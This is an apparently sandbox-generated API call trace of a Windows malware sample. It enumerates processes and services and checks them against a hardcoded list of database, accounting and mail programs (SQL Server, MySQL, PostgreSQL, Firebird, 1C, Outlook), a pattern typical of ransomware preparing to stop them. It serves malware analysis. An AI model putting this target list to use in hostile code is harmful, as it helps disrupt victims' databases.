	[0140.965] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0140.965] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.965] lstrlenW (lpString="svchost.exe") returned 11
	[0140.965] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0140.965] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0140.965] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0140.965] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0140.965] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0140.965] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0140.965] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0140.965] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.966] lstrlenW (lpString="svchost.exe") returned 11
	[0140.966] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0140.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0140.966] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0140.966] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0140.966] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0140.966] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0140.966] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0140.966] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.966] lstrlenW (lpString="svchost.exe") returned 11
	[0140.966] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0140.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0140.966] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0140.966] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0140.966] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0140.966] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0140.966] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0140.966] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.967] lstrlenW (lpString="svchost.exe") returned 11
	[0140.967] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0140.967] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0140.967] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0140.967] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0140.967] lstrlenW (lpString="audiodg.exe") returned 11
	[0140.967] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.967] lstrlenW (lpString="svchost.exe") returned 11
	[0140.967] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.968] lstrlenW (lpString="svchost.exe") returned 11
	[0140.968] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0140.968] lstrlenW (lpString="spoolsv.exe") returned 11
	[0140.968] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0140.968] lstrlenW (lpString="svchost.exe") returned 11
	[0140.968] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0140.969] lstrlenW (lpString="taskhost.exe") returned 12
	[0140.969] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0140.969] lstrlenW (lpString="userinit.exe") returned 12
	[0140.969] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0140.969] lstrlenW (lpString="dwm.exe") returned 7
	[0140.970] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0140.970] lstrlenW (lpString="explorer.exe") returned 12
	[0140.970] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0140.970] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0140.970] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0140.970] lstrlenW (lpString="reader_sl.exe") returned 13
	[0140.971] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0140.971] CloseHandle (hObject=0x3a4) returned 1
	[0140.971] Sleep (dwMilliseconds=0x1f4) 
	[0141.494] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb617110
	[0141.494] EnumServicesStatusExW (in: hSCManager=0xb617110, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0141.494] GetLastError () returned 0xea
	[0141.494] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0141.494] EnumServicesStatusExW (in: hSCManager=0xb617110, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0141.495] CloseServiceHandle (hSCObject=0xb617110) returned 1
	[0141.495] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0141.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0141.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0141.495] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0141.495] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0141.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0141.495] lstrlenW (lpString="AudioSrv") returned 8
	[0141.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0141.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0141.495] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0141.495] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0141.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0141.495] lstrlenW (lpString="BFE") returned 3
	[0141.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0141.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0141.495] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0141.495] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0141.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0141.495] lstrlenW (lpString="CryptSvc") returned 8
	[0141.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0141.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0141.496] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0141.496] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0141.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0141.496] lstrlenW (lpString="CscService") returned 10
	[0141.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0141.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0141.496] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0141.496] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0141.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0141.496] lstrlenW (lpString="DcomLaunch") returned 10
	[0141.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0141.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0141.496] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0141.496] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0141.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0141.496] lstrlenW (lpString="Dhcp") returned 4
	[0141.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0141.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0141.496] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0141.496] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0141.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0141.496] lstrlenW (lpString="Dnscache") returned 8
	[0141.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0141.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0141.496] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0141.496] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0141.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0141.496] lstrlenW (lpString="DPS") returned 3
	[0141.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0141.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0141.496] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0141.496] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0141.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0141.497] lstrlenW (lpString="eventlog") returned 8
	[0141.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0141.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0141.497] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0141.497] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0141.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0141.497] lstrlenW (lpString="EventSystem") returned 11
	[0141.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0141.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0141.497] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0141.497] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0141.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0141.497] lstrlenW (lpString="gpsvc") returned 5
	[0141.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0141.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0141.497] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0141.497] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0141.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0141.497] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0141.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0141.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0141.497] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0141.497] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0141.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0141.497] lstrlenW (lpString="lmhosts") returned 7
	[0141.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0141.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0141.497] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0141.497] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0141.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0141.497] lstrlenW (lpString="MMCSS") returned 5
	[0141.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0141.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0141.497] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0141.498] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0141.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0141.498] lstrlenW (lpString="MpsSvc") returned 6
	[0141.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0141.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0141.498] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0141.498] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0141.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0141.498] lstrlenW (lpString="NlaSvc") returned 6
	[0141.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0141.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0141.498] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0141.498] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0141.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0141.498] lstrlenW (lpString="nsi") returned 3
	[0141.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0141.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0141.498] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0141.498] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0141.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0141.498] lstrlenW (lpString="PcaSvc") returned 6
	[0141.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0141.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0141.498] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0141.498] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0141.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0141.498] lstrlenW (lpString="PlugPlay") returned 8
	[0141.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0141.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0141.498] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0141.498] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0141.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0141.498] lstrlenW (lpString="Power") returned 5
	[0141.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0141.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0141.499] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0141.499] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0141.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0141.499] lstrlenW (lpString="ProfSvc") returned 7
	[0141.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0141.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0141.499] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0141.499] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0141.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0141.499] lstrlenW (lpString="RpcEptMapper") returned 12
	[0141.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0141.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0141.499] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0141.499] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0141.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0141.499] lstrlenW (lpString="RpcSs") returned 5
	[0141.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0141.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0141.499] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0141.499] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0141.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0141.499] lstrlenW (lpString="SamSs") returned 5
	[0141.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0141.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0141.499] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0141.499] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0141.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0141.499] lstrlenW (lpString="Schedule") returned 8
	[0141.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0141.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0141.500] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0141.500] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0141.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0141.500] lstrlenW (lpString="SENS") returned 4
	[0141.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0141.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0141.500] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0141.500] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0141.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0141.500] lstrlenW (lpString="ShellHWDetection") returned 16
	[0141.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0141.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0141.500] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0141.500] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0141.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0141.500] lstrlenW (lpString="Spooler") returned 7
	[0141.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0141.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0141.500] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0141.500] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0141.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0141.500] lstrlenW (lpString="Themes") returned 6
	[0141.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0141.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0141.500] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0141.500] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0141.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0141.500] lstrlenW (lpString="UxSms") returned 5
	[0141.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0141.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0141.500] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0141.500] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0141.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0141.501] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0141.501] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x31c
	[0141.503] Process32FirstW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0141.503] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0141.503] lstrlenW (lpString="System") returned 6
	[0141.503] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0141.503] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0141.503] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0141.503] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0141.503] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0141.503] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0141.503] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0141.504] Process32NextW (in: hSnapshot=0x31c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0141.504] lstrlenW (lpString="smss.exe") returned 8
	[0141.504] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0141.504] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0141.504] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0141.504] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0141.504] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0141.504] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0141.504] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
